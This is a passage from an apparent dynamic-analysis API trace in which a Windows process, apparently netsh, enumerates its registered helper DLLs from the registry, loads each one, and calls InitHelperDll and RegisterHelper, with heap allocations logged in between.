dwFlags=0x0) returned 0x6e040000 [0110.992] GetProcAddress (hModule=0x6e040000, lpProcName="InitHelperDll") returned 0x6e041a70 [0110.992] InitHelperDll () returned 0x0 [0110.992] RegisterHelper () returned 0x0 [0110.992] GetProcessHeap () returned 0xc50000 [0110.992] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3f0) returned 0xc70ac0 [0110.992] GetProcessHeap () returned 0xc50000 [0110.992] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6df00) returned 1 [0110.992] RegEnumValueW (in: hKey=0x10c, dwIndex=0x4, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="dot3cfg", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0110.993] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0110.993] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0110.993] GetProcessHeap () returned 0xc50000 [0110.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x78) returned 0xc65ef8 [0110.993] GetProcessHeap () returned 0xc50000 [0110.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc6da78 [0110.993] GetProcessHeap () returned 0xc50000 [0110.993] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc5de68 [0110.993] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0110.993] GetProcessHeap () returned 0xc50000 [0110.993] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc66460) returned 1 [0110.993] LoadLibraryExW (lpLibFileName="DOT3CFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e020000 [0111.829] GetProcAddress (hModule=0x6e020000, lpProcName="InitHelperDll") returned 0x6e023ae0 [0111.830] InitHelperDll () returned 0x0 [0111.830] RegisterHelper () returned 0x0 [0111.830] GetProcessHeap () returned 0xc50000 [0111.830] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x438) returned 0xc6db98 [0111.830] GetProcessHeap () returned 0xc50000 [0111.830] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc70ac0) returned 1 [0111.830] RegEnumValueW (in: hKey=0x10c, dwIndex=0x5, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="fwcfg", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0111.830] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0111.830] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0111.830] GetProcessHeap () returned 0xc50000 [0111.830] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8c) returned 0xc64b20 [0111.830] GetProcessHeap () returned 0xc50000 [0111.830] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc6d9d0 [0111.830] GetProcessHeap () returned 0xc50000 [0111.830] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x14) returned 0xc5dc68 [0111.830] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0111.830] GetProcessHeap () returned 0xc50000 [0111.830] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc65ef8) returned 1 [0111.830] LoadLibraryExW (lpLibFileName="FWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6df50000 [0112.121] GetProcAddress (hModule=0x6df50000, lpProcName="InitHelperDll") returned 0x6df522e0 [0112.122] InitHelperDll () returned 0x0 [0112.122] RegisterHelper () returned 0x0 [0112.122] GetProcessHeap () returned 0xc50000 [0112.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x480) returned 0xc70ac0 [0112.122] GetProcessHeap () returned 0xc50000 [0112.122] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6db98) returned 1 [0112.122] RegEnumValueW (in: hKey=0x10c, dwIndex=0x6, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="hnetmon", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0112.122] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0112.122] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0112.122] GetProcessHeap () returned 0xc50000 [0112.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa0) returned 0xc54bd8 [0112.122] GetProcessHeap () returned 0xc50000 [0112.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc6d7c0 [0112.122] GetProcessHeap () returned 0xc50000 [0112.122] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc5dca8 [0112.122] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0112.122] GetProcessHeap () returned 0xc50000 [0112.122] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc64b20) returned 1 [0112.122] LoadLibraryExW (lpLibFileName="HNETMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x6df40000 [0113.355] GetProcAddress (hModule=0x6df40000, lpProcName="InitHelperDll") returned 0x6df424a0 [0113.355] InitHelperDll () returned 0x0 [0113.355] RegisterHelper () returned 0x0 [0113.355] GetProcessHeap () returned 0xc50000 [0113.355] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c8) returned 0xc74aa8 [0113.355] GetProcessHeap () returned 0xc50000 [0113.356] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc70ac0) returned 1 [0113.356] RegEnumValueW (in: hKey=0x10c, dwIndex=0x7, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="netiohlp", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0113.356] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0113.356] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0113.356] GetProcessHeap () returned 0xc50000 [0113.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb4) returned 0xc67a50 [0113.356] GetProcessHeap () returned 0xc50000 [0113.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc5dd88 [0113.356] GetProcessHeap () returned 0xc50000 [0113.356] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1a) returned 0xc62560 [0113.356] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0113.356] GetProcessHeap () returned 0xc50000 [0113.356] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc54bd8) returned 1 [0113.356] LoadLibraryExW (lpLibFileName="NETIOHLP.DLL", hFile=0x0, dwFlags=0x0) returned 0x6c350000 [0114.074] GetProcAddress (hModule=0x6c350000, lpProcName="InitHelperDll") returned 0x6c366c00 [0114.074] InitHelperDll () returned 0x0 [0114.074] RegisterHelper () returned 0x0 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x510) returned 0xc70ac0 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74aa8) returned 1 [0114.074] RegisterHelper () returned 0x0 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x558) returned 0xc74aa8 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc70ac0) returned 1 [0114.074] RegisterHelper () returned 0x0 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5a0) returned 0xc70ac0 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74aa8) returned 1 [0114.074] RegisterHelper () returned 0x0 [0114.074] GetProcessHeap () returned 0xc50000 [0114.074] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5e8) returned 0xc74aa8 [0114.074] GetProcessHeap () returned 0xc50000 [0114.075] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc70ac0) returned 1 [0114.075] RegisterHelper () returned 0x0 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x630) returned 0xc75098 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74aa8) returned 1 [0114.075] RegisterHelper () returned 0x0 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x678) returned 0xc756d0 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc75098) returned 1 [0114.075] RegisterHelper () returned 0x0 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6c0) returned 0xc74aa8 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc756d0) returned 1 [0114.075] RegisterHelper () returned 0x0 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x708) returned 0xc75170 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74aa8) returned 1 [0114.075] RegisterHelper () returned 0x0 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x750) returned 0xc75880 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc75170) returned 1 [0114.075] RegEnumValueW (in: hKey=0x10c, dwIndex=0x8, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="nshhttp", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0114.075] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0114.075] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc8) returned 0xc6db98 [0114.075] GetProcessHeap () returned 0xc50000 [0114.075] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc6dd10 [0114.075] GetProcessHeap () returned 0xc50000 [0114.076] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc5dec8 [0114.076] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0114.076] GetProcessHeap () returned 0xc50000 [0114.076] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc67a50) returned 1 [0114.076] LoadLibraryExW (lpLibFileName="NSHHTTP.DLL", hFile=0x0, dwFlags=0x0) returned 0x6c340000 [0114.308] GetProcAddress (hModule=0x6c340000, lpProcName="InitHelperDll") returned 0x6c341c50 [0114.308] InitHelperDll () returned 0x0 [0114.308] RegisterHelper () returned 0x0 [0114.308] GetProcessHeap () returned 0xc50000 [0114.308] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x798) returned 0xc74aa8 [0114.308] GetProcessHeap () returned 0xc50000 [0114.308] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc75880) returned 1 [0114.308] RegEnumValueW (in: hKey=0x10c, dwIndex=0x9, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="nshipsec", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0114.308] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0114.308] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0114.308] GetProcessHeap () returned 0xc50000 [0114.308] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xdc) returned 0xc67a50 [0114.309] GetProcessHeap () returned 0xc50000 [0114.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc5dcc8 [0114.309] GetProcessHeap () returned 0xc50000 [0114.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1a) returned 0xc625b0 [0114.309] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0114.309] GetProcessHeap () returned 0xc50000 [0114.309] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6db98) returned 1 [0114.309] LoadLibraryExW (lpLibFileName="NSHIPSEC.DLL", hFile=0x0, dwFlags=0x0) returned 0x6c2c0000 [0116.039] GetProcAddress (hModule=0x6c2c0000, lpProcName="InitHelperDll") returned 0x6c2c3990 [0116.039] InitHelperDll () returned 0x0 [0116.039] RegisterHelper () returned 0x0 [0116.039] GetProcessHeap () returned 0xc50000 [0116.039] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7e0) returned 0xc777e8 [0116.039] GetProcessHeap () returned 0xc50000 [0116.039] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74aa8) returned 1 [0116.039] RegisterHelper () returned 0x0 [0116.039] GetProcessHeap () returned 0xc50000 [0116.039] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x828) returned 0xc77fd0 [0116.040] GetProcessHeap () returned 0xc50000 [0116.040] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc777e8) returned 1 [0116.040] RegisterHelper () returned 0x0 [0116.040] GetProcessHeap () returned 0xc50000 [0116.040] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x870) returned 0xc78800 [0116.040] GetProcessHeap () returned 0xc50000 [0116.040] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc77fd0) returned 1 [0116.198] RegEnumValueW (in: hKey=0x10c, dwIndex=0xa, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="nshwfp", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0116.198] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0116.198] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0116.198] GetProcessHeap () returned 0xc50000 [0116.198] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xf0) returned 0xc6db98 [0116.198] GetProcessHeap () returned 0xc50000 [0116.198] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe) returned 0xc70d78 [0116.198] GetProcessHeap () returned 0xc50000 [0116.198] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x16) returned 0xc5dd08 [0116.198] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0116.198] GetProcessHeap () returned 0xc50000 [0116.198] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc67a50) returned 1 [0116.198] LoadLibraryExW (lpLibFileName="NSHWFP.DLL", hFile=0x0, dwFlags=0x0) returned 0x6c100000 [0117.037] GetProcAddress (hModule=0x6c100000, lpProcName="InitHelperDll") returned 0x6c156ab0 [0117.037] InitHelperDll () returned 0x0 [0117.047] RegisterHelper () returned 0x0 [0117.047] GetProcessHeap () returned 0xc50000 [0117.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8b8) returned 0xc777e8 [0117.047] GetProcessHeap () returned 0xc50000 [0117.047] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78800) returned 1 [0117.047] RegEnumValueW (in: hKey=0x10c, dwIndex=0xb, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="p2pnetsh", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0117.047] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0117.047] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0117.047] GetProcessHeap () returned 0xc50000 [0117.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x104) returned 0xc74cb0 [0117.047] GetProcessHeap () returned 0xc50000 [0117.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc5dde8 [0117.047] GetProcessHeap () returned 0xc50000 [0117.047] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1a) returned 0xc77588 [0117.047] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0117.047] GetProcessHeap () returned 0xc50000 [0117.047] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6db98) returned 1 [0117.047] LoadLibraryExW (lpLibFileName="P2PNETSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e460000 [0117.745] GetProcAddress (hModule=0x6e460000, lpProcName="InitHelperDll") returned 0x6e465910 [0117.745] InitHelperDll () returned 0x0 [0117.745] RegisterHelper () returned 0x0 [0117.745] GetProcessHeap () returned 0xc50000 [0117.745] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x900) returned 0xc780a8 [0117.745] GetProcessHeap () returned 0xc50000 [0117.745] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc777e8) returned 1 [0117.745] RegisterHelper () returned 0x0 [0117.745] GetProcessHeap () returned 0xc50000 [0117.745] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x948) returned 0xc7c2d8 [0117.745] GetProcessHeap () returned 0xc50000 [0117.745] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc780a8) returned 1 [0117.745] RegisterHelper () returned 0x0 [0117.745] GetProcessHeap () returned 0xc50000 [0117.745] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x990) returned 0xc777e8 [0117.745] GetProcessHeap () returned 0xc50000 [0117.745] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c2d8) returned 1 [0117.745] RegisterHelper () returned 0x0 [0117.745] GetProcessHeap () returned 0xc50000 [0117.746] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x9d8) returned 0xc78180 [0117.746] GetProcessHeap () returned 0xc50000 [0117.746] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc777e8) returned 1 [0117.749] RegisterHelper () returned 0x0 [0117.749] GetProcessHeap () returned 0xc50000 [0117.749] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa20) returned 0xc7c2d8 [0117.749] GetProcessHeap () returned 0xc50000 [0117.749] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78180) returned 1 [0117.749] RegisterHelper () returned 0x0 [0117.749] GetProcessHeap () returned 0xc50000 [0117.749] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa68) returned 0xc777e8 [0117.749] GetProcessHeap () returned 0xc50000 [0117.749] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c2d8) returned 1 [0117.749] RegisterHelper () returned 0x0 [0117.749] GetProcessHeap () returned 0xc50000 [0117.749] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xab0) returned 0xc78258 [0117.749] GetProcessHeap () returned 0xc50000 [0117.750] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc777e8) returned 1 [0117.752] RegisterHelper () returned 0x0 [0117.752] GetProcessHeap () returned 0xc50000 [0117.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xaf8) returned 0xc7c2d8 [0117.752] GetProcessHeap () returned 0xc50000 [0117.752] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78258) returned 1 [0117.752] RegEnumValueW (in: hKey=0x10c, dwIndex=0xc, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="rpc", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0117.752] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0117.752] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0117.752] GetProcessHeap () returned 0xc50000 [0117.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x118) returned 0xc6db98 [0117.752] GetProcessHeap () returned 0xc50000 [0117.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d948 [0117.752] GetProcessHeap () returned 0xc50000 [0117.752] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x16) returned 0xc5dd28 [0117.752] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0117.752] GetProcessHeap () returned 0xc50000 [0117.752] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74cb0) returned 1 [0117.752] LoadLibraryExW (lpLibFileName="RPCNSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e420000 [0118.147] GetProcAddress (hModule=0x6e420000, lpProcName="InitHelperDll") returned 0x6e422ae0 [0118.147] InitHelperDll () returned 0x0 [0118.147] RegisterHelper () returned 0x0 [0118.147] GetProcessHeap () returned 0xc50000 [0118.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb40) returned 0xc777e8 [0118.147] GetProcessHeap () returned 0xc50000 [0118.147] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c2d8) returned 1 [0118.147] RegisterHelper () returned 0x0 [0118.147] GetProcessHeap () returned 0xc50000 [0118.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb88) returned 0xc78330 [0118.147] GetProcessHeap () returned 0xc50000 [0118.147] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc777e8) returned 1 [0118.147] RegEnumValueW (in: hKey=0x10c, dwIndex=0xd, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="whhelper", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0118.147] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0118.147] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0118.147] GetProcessHeap () returned 0xc50000 [0118.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12c) returned 0xc74ef8 [0118.147] GetProcessHeap () returned 0xc50000 [0118.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc5de48 [0118.148] GetProcessHeap () returned 0xc50000 [0118.148] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1a) returned 0xc77510 [0118.148] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0118.148] GetProcessHeap () returned 0xc50000 [0118.148] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6db98) returned 1 [0118.148] LoadLibraryExW (lpLibFileName="WHHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e410000 [0118.167] GetProcAddress (hModule=0x6e410000, lpProcName="InitHelperDll") returned 0x6e4118d0 [0118.167] InitHelperDll () returned 0x0 [0118.167] RegisterHelper () returned 0x0 [0118.167] GetProcessHeap () returned 0xc50000 [0118.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xbd0) returned 0xc7c2d8 [0118.167] GetProcessHeap () returned 0xc50000 [0118.167] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78330) returned 1 [0118.167] RegEnumValueW (in: hKey=0x10c, dwIndex=0xe, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="wlancfg", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0118.167] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0118.167] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0118.167] GetProcessHeap () returned 0xc50000 [0118.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x140) returned 0xc777e8 [0118.167] GetProcessHeap () returned 0xc50000 [0118.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc70b50 [0118.167] GetProcessHeap () returned 0xc50000 [0118.167] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc5dee8 [0118.168] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0118.168] GetProcessHeap () returned 0xc50000 [0118.168] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc74ef8) returned 1 [0118.168] LoadLibraryExW (lpLibFileName="WLANCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e3d0000 [0119.594] GetProcAddress (hModule=0x6e3d0000, lpProcName="InitHelperDll") returned 0x6e3dabb0 [0119.594] InitHelperDll () returned 0x0 [0119.594] RegisterHelper () returned 0x0 [0119.594] GetProcessHeap () returned 0xc50000 [0119.594] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc18) returned 0xc78440 [0119.594] GetProcessHeap () returned 0xc50000 [0119.594] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c2d8) returned 1 [0119.594] RegEnumValueW (in: hKey=0x10c, dwIndex=0xf, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="wshelper", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0119.594] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0119.594] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0119.594] GetProcessHeap () returned 0xc50000 [0119.594] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x154) returned 0xc74ef8 [0119.594] GetProcessHeap () returned 0xc50000 [0119.594] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc5df48 [0119.594] GetProcessHeap () returned 0xc50000 [0119.594] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1a) returned 0xc776a0 [0119.594] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0119.594] GetProcessHeap () returned 0xc50000 [0119.594] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc777e8) returned 1 [0119.594] LoadLibraryExW (lpLibFileName="WSHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e380000 [0120.012] GetProcAddress (hModule=0x6e380000, lpProcName="InitHelperDll") returned 0x6e381720 [0120.012] InitHelperDll () returned 0x0 [0120.012] RegisterHelper () returned 0x0 [0120.012] GetProcessHeap () returned 0xc50000 [0120.012] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, 